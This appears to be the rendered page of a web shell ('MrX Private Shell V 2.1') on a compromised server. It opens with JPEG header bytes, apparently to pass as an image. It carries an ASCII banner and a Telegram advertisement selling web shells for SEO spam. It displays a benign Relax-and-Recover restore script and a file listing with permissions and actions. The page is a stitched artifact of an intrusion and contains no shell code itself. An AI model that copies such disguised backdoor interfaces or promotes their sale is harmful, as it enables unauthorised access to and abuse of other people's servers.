����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#
# For the restoreonly WORKFLOW remount everything without sync option
# otherwise the restore would be terribly slow.
# Things may have been remounted with sync option in a preceding recover WORKFLOW
# via finalize/default/900_remount_sync.sh
# see also https://github.com/rear/rear/issues/1097
#
# Remounting with async option is not needed when systemd is used because
# when systemd is used remounting with sync option is skipped in a preceding
# recover WORKFLOW via finalize/default/900_remount_sync.sh and to avoid
# needless operations remounting with async option is also skipped here
# cf. https://github.com/rear/rear/issues/1097
# Skip if not restoreonly WORKFLOW:
test "restoreonly" = "$WORKFLOW" || return 0
# Skip if systemd is used
# systemctl gets copied into the recovery system as /bin/systemctl:
test -x /bin/systemctl && return 0
while read mountpoint device mountby filesystem junk ; do
if ! mount -o remount,async "${device}" $TARGET_FS_ROOT"$mountpoint" ; then
LogPrint "Remount async of '${device}' failed which can result very slow restore"
fi
done < "${VAR_DIR}/recovery/mountpoint_device"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 050_remount_async.sh | File | 1.11 KB | 0644 |
|
| 500_selinux_autorelabel.sh | File | 945 B | 0644 |
|
| 900_create_missing_directories.sh | File | 5.32 KB | 0644 |
|
| 950_restore_esp.sh | File | 350 B | 0644 |
|
| 990_move_away_restored_files.sh | File | 4.27 KB | 0644 |
|
| 995_remount_sync.sh | File | 1.4 KB | 0644 |
|